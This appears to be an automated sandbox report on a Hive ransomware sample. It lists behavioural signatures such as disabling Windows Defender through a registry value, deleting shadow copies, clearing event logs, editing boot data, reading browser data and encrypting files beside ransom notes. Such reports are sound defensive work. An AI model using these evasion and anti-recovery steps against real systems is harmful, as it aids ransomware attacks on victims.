Malware Analysis Report

2024-10-16 03:11

Sample ID 220112-x5lm5adgdn
Target c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.7z
SHA256 1cba1a291ce919947f88133cd5e57177a1a1585fcb91bc39f61fabccf52ca76a
Tags
hive evasion ransomware spyware stealer trojan
score
10/10


Analysis Overview

score
10/10

SHA256

1cba1a291ce919947f88133cd5e57177a1a1585fcb91bc39f61fabccf52ca76a

Threat Level: Known bad

The file c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.7z was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies security service

Deletes Windows Defender Definitions

Hive

Modifies Windows Defender Real-time Protection settings

Modifies boot configuration data using bcdedit

Clears Windows event logs

Deletes shadow copies

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Opens file in notepad (likely ransom note)

Interacts with shadow copies

Runs net.exe

MITRE ATT&CK (Enterprise Matrix V6)

Analysis: static1

Detonation Overview

Reported

2022-01-12 19:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 19:26

Reported

2022-01-12 19:31

Platform

win7-en-20211208

Max time kernel

182s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_-QdHfhJgdIo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYER98.POC.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_IP1QxnAExbA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\css\cpu.css | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215076.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_nYvWBHUVz2k0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_AktY0Fb8tj40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_x8wScbWpV0A0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\STRTEDGE.INF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_q7mDP58Ue640.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099201.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_ppJWokR7gNc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_9znLbMUVkOw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099184.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_L0jB_2BzHVE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105368.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_CsxtEScqIOc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_OLHdCQs6qlM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_5oAyYdFdhGs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\settings.css | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_zcaawo9I91I0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_t8ybF_woHpI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\TOC98.POC.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_dpTWGEB2zlo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_HguxSk5_qJQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_eAoPrwCmf6M0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_disable.gif.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1NUNv85SfKE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_H9Sw2I-NhPQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\ja-JP\sbdrop.dll.mui | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_aHyk0Cx-EoY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_down.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00555_.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_Rz7rbldeanM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Solstice.thmx.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_7VYzzCb49Bc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_r1JsYqjHkfQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_GreenTea.gif.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_fyyKrIIjZhw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSTH7FR.LEX.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1S0DkVNFyJE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Stationery\1033\PAWPRINT.HTM.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_dG0Y2VLVPZU0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_gNJm2LdGyeE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1tc5K1JFgj00.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_MfOITshG0C40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_4qfVfFrBGDc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_EKm8KedZVac0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_xvsftD7L4eE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_59CfPhvU4gc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01743_.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_LFS10E66NZI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_RQmmA2AZqb40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1LEJ-ivifeA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\3.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_S6nEgIoxBnA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_i6rkMkgC6hE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_POsspnLpQio0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Opens file in notepad (likely ransom note)

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\notepad.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
